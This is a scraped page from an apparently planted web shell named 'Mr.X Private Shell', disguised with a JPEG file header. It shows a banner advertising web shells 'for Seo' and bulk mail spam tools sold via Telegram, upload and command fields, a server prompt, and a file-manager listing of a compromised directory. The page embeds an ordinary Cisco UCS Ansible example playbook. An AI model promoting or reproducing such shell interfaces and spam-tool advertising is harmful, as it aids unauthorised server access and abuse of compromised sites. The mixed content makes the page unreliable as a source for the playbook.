����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
---
# Example Playbook: cisco.ucs.ucs_managed_objects
- hosts: ucs
  connection: local
  gather_facts: false

  tasks:
    - name: Test that we have a UCS hostname, UCS username, and UCS password
      fail:
        msg: 'Please define the following variables: ucs_hostname, ucs_username and ucs_password.'
      when: ucs_hostname is not defined or ucs_username is not defined or ucs_password is not defined
      vars:
        # use "<<: *login_info" to substite the information below in each task
        # this is not required, however it makes the playbook shorter.
        login_info: &login_info
          hostname: "{{ ucs_hostname }}"
          username: "{{ ucs_username }}"
          password: "{{ ucs_password }}"

    - name: Add UCS Organization
      cisco.ucs.ucs_org:
        <<: *login_info
        org_name: level1
        parent_org_path: root
        description: level1 org
        state: present
        delegate_to: localhost

    - name: Configure Network Control Policy
      cisco.ucs.ucs_managed_objects:
        <<: *login_info
        objects:
        - module: ucsmsdk.mometa.nwctrl.NwctrlDefinition
          class: NwctrlDefinition
          properties:
            parent_mo_or_dn: org-root/org-level1
            cdp: enabled
            descr: ''
            lldp_receive: enabled
            lldp_transmit: enabled
            name: Enable-CDP-LLDP
      
    - name: Remove Network Control Policy
      cisco.ucs.ucs_managed_objects:
        <<: *login_info
        objects:
        - module: ucsmsdk.mometa.nwctrl.NwctrlDefinition
          class: NwctrlDefinition
          properties:
            parent_mo_or_dn: org-root/org-level1
            name: Enable-CDP-LLDP
        state: absent
      
    - name: Configure Boot Policy Using JSON objects list with children
      cisco.ucs.ucs_managed_objects:
        <<: *login_info
        objects:
        - {
              "module": "ucsmsdk.mometa.lsboot.LsbootPolicy",
              "class": "LsbootPolicy",
              "properties": {
                  "parent_mo_or_dn": "org-root/org-level1",
                  "name": "Python_SDS",
                  "enforce_vnic_name": "yes",
                  "boot_mode": "legacy",
                  "reboot_on_update": "no"
              },
              "children": [
                  {
                      "module": "ucsmsdk.mometa.lsboot.LsbootVirtualMedia",
                      "class": "LsbootVirtualMedia",
                      "properties": {
                          "access": "read-only-local",
                          "lun_id": "0",
                          "order": "2"
                      }
                  },
                  {
                      "module": "ucsmsdk.mometa.lsboot.LsbootStorage",
                      "class": "LsbootStorage",
                      "properties": {
                          "order": "1"
                      },
                      "children": [
                          {
                              "module": "ucsmsdk.mometa.lsboot.LsbootLocalStorage",
                              "class": "LsbootLocalStorage",
                              "properties": {},
                              "children": [
                                  {
                                      "module": "ucsmsdk.mometa.lsboot.LsbootDefaultLocalImage",
                                      "class": "LsbootDefaultLocalImage",
                                      "properties": {
                                          "order": "1"
                                      }
                                  }
                              ]
                          }
                      ]
                  }
              ]
          }
      
    - name: Remove Boot Policy Using JSON objects list
      cisco.ucs.ucs_managed_objects:
        <<: *login_info
        objects:
        - {
              "module": "ucsmsdk.mometa.lsboot.LsbootPolicy",
              "class": "LsbootPolicy",
              "properties": {
                  "parent_mo_or_dn": "org-root/org-level1",
                  "name": "Python_SDS"
              }
          }
        state: absent

    - name: Remove UCS Organization
      cisco.ucs.ucs_org:
        <<: *login_info
        org_name: level1
        parent_org_path: root
        state: absent
        delegate_to: localhost

Filemanager

Name Type Size Permission Actions
roles Folder 0755
example_playbook.yml File 472 B 0644
fw_download_config_hfp.yml File 3.08 KB 0644
inventory File 63 B 0644
sandbox_inventory File 103 B 0644
server_deploy.yml File 1.38 KB 0644
ucs_disk_group_policy.yml File 2.13 KB 0644
ucs_dns_server.yml File 1.08 KB 0644
ucs_graphics_card_policy.yml File 3.18 KB 0644
ucs_ip_pool.yml File 2.5 KB 0644
ucs_lan_connectivity.yml File 2.05 KB 0644
ucs_mac_pool.yml File 1.52 KB 0644
ucs_managed_objects.yml File 4.26 KB 0644
ucs_ntp_server.yml File 1.38 KB 0644
ucs_org.yml File 2.02 KB 0644
ucs_query.yml File 1.74 KB 0644
ucs_san_connectivity.yml File 1.72 KB 0644
ucs_scrub_policy.yml File 3.52 KB 0644
ucs_serial_over_lan_policy.yml File 3.17 KB 0644
ucs_server_maintenance.yml File 1.42 KB 0644
ucs_service_profile_association.yml File 1.9 KB 0644
ucs_service_profile_from_template.yml File 2.23 KB 0644
ucs_service_profile_template.yml File 1.95 KB 0644
ucs_sp_vnic_order.yml File 996 B 0644
ucs_storage_profile.yml File 1.87 KB 0644
ucs_system_qos.yml File 1.92 KB 0644
ucs_timezone.yml File 1.01 KB 0644
ucs_uuid_pool.yml File 1.54 KB 0644
ucs_vhba_template.yml File 1.5 KB 0644
ucs_vlan_find.yml File 1.14 KB 0644
ucs_vlan_to_group.yml File 909 B 0644
ucs_vlans.yml File 980 B 0644
ucs_vnic_template.yml File 2.63 KB 0644
ucs_vsans.yml File 1010 B 0644
ucs_wwn_pool.yml File 2.41 KB 0644